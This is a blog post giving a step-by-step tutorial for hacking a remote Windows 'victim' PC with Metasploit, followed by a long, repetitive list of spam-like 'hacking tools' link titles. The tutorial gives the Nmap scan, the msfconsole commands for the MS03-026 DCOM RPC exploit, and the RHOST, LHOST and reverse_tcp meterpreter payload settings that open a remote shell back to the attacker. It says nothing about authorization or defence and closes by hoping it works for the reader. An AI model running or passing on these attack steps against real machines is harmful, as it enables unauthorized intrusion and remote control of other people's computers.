Make 'em

IP

Sunday 28 May 2023

HOW TO HACK A PC REMOTELY WITH METASPLOIT?

Metasploit is an advanced hacking tool that comes itself with a complete lack of advanced penetration testing tools. Penetration testers and hackers are taking so much advantage of this tool. It's a complete hack pack for a hacker that he can play almost any attack with it. I am not covering attacks in this article but I am going to share about how to hack a PC remotely with Metasploit. It's not so complicated if you pay attention to. It just needs a better understanding of each step you're performing. Let's move on how to do it.

SO, HOW TO HACK A PC REMOTELY WITH METASPLOIT?

REQUIREMENTS

Before getting started, make sure you have all the following things required to hack a PC remotely with Metasploit.
  • Linux Machine (Kali Linux or BackTrack 5)
  • Metasploit (Built in the mentioned Linux OS)
  • Windows PC victim

STEPS TO FOLLOW

Let's move on how to perform the complete attack.
  • Start your Linux OS and open up Nmap and run a scan for your victim remote server. Like we have our victim on remote server 192.168.42.129. It will show up the range of all open ports of the victim machine as you can see below.
  • We can see the open port here is 135. So, now we go to Metasploit and try to exploit and gain access to it. To open up, navigate to Application > BackTrack > Exploitation Tools > Network Exploitation Tools > Metasploit Framework > msfconsole.
  • After the initialization of msfconsole, standard checks, we will see the window like below.
  • Now, as we already know that our port 135 is open so, we search for a related RPC exploit in Metasploit. You can check out all the exploit list supported by Metasploit by using command 'show exploits'.
  • Now to activate an exploit, type the "use " with the exploit name like "use exploit/windows/dcerpc/ms03_026_dcom".
  • As we're in our required exploit environment, we need to configure the exploit according to our scenario. To check out the list of all the available options of an exploit, we can use command "show options". As we already know about the open port RPORT is 135. So, we just need to set our RHOST which we can set simply using the "set RHOST" command. Just type "set RHOST 192.168.42.129" and it's done.
  • Now before we launch the exploit is setting the payload for the exploit. We can view all the available payloads using the "show payloads" command.
  • Every payload can be used for a different scenario. In our case, we are using the reverse TCP meterpreter which can be set using the command, "set PAYLOAD windows/meterpreter/reverse_tcp" for remote shell and then use "show options" command to view the options for it.
  • Here we notice LHOST for out payload is not set, so we set it out to our Public IP i.e. 192.168.42.128 using the command "set LHOST 192.168.42.128".
  • Now exploit is configured and ready to launch. Now simply use "exploit" command to launch the attack. If exploit is executed successfully, we will see the message like below.
  • Now that a reverse connection has been set up between the victim and our machine, we have complete control of the server.  To find out all the commands to play with the victim machine, we can use the "help".

We have successfully gained access to a remote PC with Metasploit. That's all how to hack a PC remotely with Metasploit. Hope it will work for you.
More information

  1. Pentest Tools For Ubuntu
  2. Pentest Tools For Ubuntu
  3. Pentest Tools Linux
  4. Hacker Tools For Pc
  5. Pentest Tools Bluekeep
  6. Hack Tool Apk
  7. Hacker Tools Software
  8. Hacking Tools Windows 10
  9. Hacker Techniques Tools And Incident Handling
  10. Hacking Tools For Games
  11. Hacking Tools Online
  12. Nsa Hacker Tools
  13. New Hack Tools
  14. Pentest Tools Website
  15. Pentest Tools Download
  16. Hacker Tools Free Download
  17. Pentest Tools Alternative
  18. How To Install Pentest Tools In Ubuntu
  19. Black Hat Hacker Tools
  20. Hacker Tools Windows
  21. Install Pentest Tools Ubuntu
  22. Hacker Tools Online
  23. Hacker Tools Windows
  24. Pentest Tools Port Scanner
  25. Hackrf Tools
  26. World No 1 Hacker Software
  27. Best Hacking Tools 2020
  28. Hacking Tools For Kali Linux
  29. Hacker Tools Apk Download
  30. Hacks And Tools
  31. How To Hack
  32. Hack App
  33. Game Hacking
  34. Wifi Hacker Tools For Windows
  35. Hack Website Online Tool
  36. Pentest Reporting Tools
  37. Pentest Tools Alternative
  38. Pentest Tools Framework
  39. Pentest Reporting Tools
  40. Pentest Tools For Windows
  41. Hacking Tools Kit
  42. Pentest Tools Apk
  43. Wifi Hacker Tools For Windows
  44. Hacking Tools Windows 10
  45. Hacker Tools For Windows
  46. Nsa Hack Tools
  47. Hack Tools For Windows
  48. Pentest Tools Apk
  49. Hacker Tools Free
  50. Hacking Tools For Windows Free Download
  51. Blackhat Hacker Tools
  52. Hacking Tools Hardware
  53. Hack Tools Pc
  54. Hacking Tools For Windows
  55. Hacker Tools Windows
  56. Kik Hack Tools
  57. Install Pentest Tools Ubuntu
  58. Hacking Tools Windows
  59. What Are Hacking Tools
  60. Hacking Tools 2020
  61. Pentest Tools List
  62. Hacking Tools Usb
  63. Hacker Tool Kit
  64. Usb Pentest Tools
  65. Wifi Hacker Tools For Windows
  66. Pentest Tools Download
  67. Hacker Techniques Tools And Incident Handling
  68. Pentest Tools Windows
  69. Pentest Tools For Mac
  70. Github Hacking Tools
  71. Hack Tools Github
  72. Hacker Tools List
  73. Hacking Tools Name
  74. Hacker Tools Github
  75. Hacking Tools 2020
  76. Github Hacking Tools
  77. Pentest Tools Review
  78. New Hack Tools
  79. Hackers Toolbox
  80. Hack Tools Online
  81. Hack App
  82. Hacking Tools And Software
  83. Best Hacking Tools 2020
  84. Hacker Tools Free Download
  85. Pentest Tools Open Source
  86. Game Hacking
  87. Hacker Techniques Tools And Incident Handling
  88. Hacker Tool Kit
  89. How To Hack
  90. New Hacker Tools
  91. Hacking Tools Hardware
  92. Hacker Tools Linux
  93. What Is Hacking Tools
  94. Hackrf Tools
  95. Github Hacking Tools
  96. Pentest Tools Android
  97. Tools Used For Hacking
  98. Top Pentest Tools
  99. Hacking Tools For Windows
  100. Usb Pentest Tools
  101. Android Hack Tools Github
  102. Hacking Tools

No comments:

Post a Comment